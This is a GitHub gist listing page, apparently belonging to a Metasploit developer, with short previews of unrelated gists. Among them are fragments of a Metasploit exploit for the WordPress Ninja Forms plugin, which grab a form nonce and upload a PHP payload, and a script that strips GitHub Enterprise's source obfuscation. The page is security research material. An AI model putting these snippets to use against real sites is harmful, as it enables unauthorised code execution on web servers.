View gist:cbb6b47f096eb4fd4a7c1c53d43d574f
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Keybase proof | |
I hereby claim: | |
* I am wchen-r7 on github. | |
* I am wchenr7 (https://keybase.io/wchenr7) on keybase. | |
* I have a public key whose fingerprint is 4D08 AF54 0F66 C184 3C7D 1942 8048 8089 2F97 A3F7 | |
To claim this, I am signing this object: |
View decrypt_github_enterprise.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/ruby | |
# | |
# This tool is only used to "decrypt" the github enterprise source code. | |
# | |
# Run in the /data directory of the instance. | |
require "zlib" | |
require "byebug" | |
KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+ |
View gist:1b4e660484ac2434397dc94eb5e8bb25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
donkeu |
View gist:701269eaf9ce2c17ad3888e18ce12248
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def fetch_ninja_form_nonce | |
uri = normalize_uri(target_uri.path, datastore['FORM_PATH']) | |
res = send_request_cgi( | |
'method' => 'GET', | |
'uri' => uri | |
) | |
puts res.body | |
fail_with Failure::UnexpectedReply, 'Failed to acquire a nonce' unless res && res.code == 200 | |
res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] |
View gist:f1eabf17cb1f9f5a655b879d42c39682
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def generate_mime_message(payload_name, nonce) | |
puts "--- You have nonce: #{nonce.inspect}" | |
data = Rex::MIME::Message.new | |
data.add_part('nf_async_upload', nil, nil, 'form-data; name="action"') | |
data.add_part(nonce, nil, nil, 'form-data; name="security"') | |
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"") | |
data | |
end |
View gist:3d8b95aa9f3e14df8d65
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
load "./lib/msf/core/exploit/exe.rb" | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote |
View gist:847a8d1246395bdbf7b1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" | |
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> | |
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> | |
<head> | |
<title>Magento Downloader</title> | |
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> | |
<link type="image/x-icon" href="/magento/downloader/favicon.ico" rel="icon"/> | |
<link type="image/x-icon" href="/magento/downloader/favicon.ico" rel="shortcut icon"/> | |
<script type="text/javascript" src="js/prototype.js"></script> |
View gist:557f825614eba20f27d7
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ rake cucumber spec coverage DATABASE_ADAPTER=sqlite3 | |
/Users/wchen/.rvm/rubies/ruby-2.1.6/bin/ruby -S bundle exec cucumber features --format Fivemat | |
'derives' shared examples' attribute_type method ............ (23.01s) | |
validates keyword argument .......... (17.46s) | |
7 scenarios (7 passed) | |
22 steps (22 passed) | |
0m40.481s | |
Coverage report generated for 'derives' shared examples' :validates keyword argument With `validates: false`, 'derives' shared examples' :validates keyword argument With `validates: true`, 'derives' shared examples' :validates keyword argument Without `:validates` keyword argument, 'derives' shared examples' attribute_type method With `:datetime` for attribute_type, 'derives' shared examples' attribute_type method With `:string` for attribute_type, 'derives' shared examples' attribute_type method With `:text` for attribute_type, 'derives' shared examples' attribute_type method Without `:datetime`, `:string`, or `:text` for attribute_type, Cucumber Features, RSpec to /Users/wchen/rapid7/metasp |
View gist:d5a1fbd08923ea47ddc3
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
01b4766c 8c f5 4e 00 00 00 00 00 00 00 00 00 d4 75 ..N..........u | |
01b4767a b4 01 e4 75 b4 01 00 00 00 00 b0 d9 12 00 ...u.......... | |
01b47688 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 .............. | |
01b47696 00 00 68 dc 78 01 88 d5 78 01 88 d5 78 01 ..h.x...x...x. | |
01b476a4 01 00 00 00 d8 2f 12 00 70 84 51 00 70 84 ...../..p.Q.p. | |
01b476b2 51 00 70 84 51 00 70 84 51 00 70 84 51 00 Q.p.Q.p.Q.p.Q. | |
01b476c0 70 84 51 00 70 84 51 00 70 84 51 00 00 00 p.Q.p.Q.p.Q... | |
01b476ce 00 00 00 00 00 00 70 84 51 00 70 84 51 00 ......p.Q.p.Q. | |
01b476dc 70 84 51 00 70 84 51 00 70 84 51 00 70 84 p.Q.p.Q.p.Q.p. | |
01b476ea 51 00 70 84 51 00 38 d5 78 01 c8 d6 78 01 Q.p.Q.8.x...x. |
View com.ilegendsoft.mercury
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@generic:/data/data/com.ilegendsoft.mercury # pwd | |
/data/data/com.ilegendsoft.mercury | |
root@generic:/data/data/com.ilegendsoft.mercury # ls -R | |
.: | |
app_webview | |
cache | |
code_cache | |
databases | |
files |
NewerOlder